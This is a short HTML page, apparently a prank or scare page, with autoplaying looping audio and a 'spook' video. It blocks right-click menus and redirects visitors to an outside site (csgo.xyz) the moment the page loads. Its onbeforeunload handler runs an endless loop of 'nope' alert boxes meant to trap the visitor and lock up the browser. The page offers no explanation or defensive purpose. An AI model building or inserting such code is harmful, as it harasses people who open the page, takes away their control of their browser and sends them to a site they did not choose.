
<html oncontextmenu="return false">
<head>
		
		
		<audio loop="loop" autoplay="true">
            <source src="images/kuwialcs.html" type="audio/mp3">
        </audio>
		
		<script>
		document.onmousedown=disableclick;
		function disableclick(event)
		{
			if(event.button==2)
			{
				return false;    
			}
		}
		</script>
		
		<style>
		body
		{
			background: #000;
		}

		.video {
			position: fixed;
			top: 50%;
			left: 50%;
			min-width: 100%;
			min-height: 100%;
			width: auto;
			height: auto;
			z-index: -100;
			transform: translateX(-50%) translateY(-50%);
			background-size: cover;
			transition: 1s opacity;
		}

		.textbox {
			margin-top: 5%;
			margin-left: 0%;
			margin-right: auto;
			color: rgba(255, 255, 255, 0.75);
			text-align: center;
			text-shadow: 1px 1px 1px #000;
			font-family: "Verdana";
			font-size: 24;
		}
		a:link {
			color: rgba(255, 255, 255, 0.75);
		}
		a:visited {
			color: rgba(255, 255, 255, 0.75);
		}
		a:hover {
			color: rgba(255, 255, 255, 0.75);
		}
		a:active {
			color: rgba(255, 255, 255, 0.75);
		}
		</style>
	</head>
	<body oncontextmenu="return false" onload="location.href='https://csgo.xyz'">
		<video autoplay loop class="video"> 
			<source src="images/spook.mp4" type="video/mp4">
		</video>
		<script>window.onbeforeunload = function(){
  while (true) { alert("nope"); };
};
</script>
	</body>
	

</html>	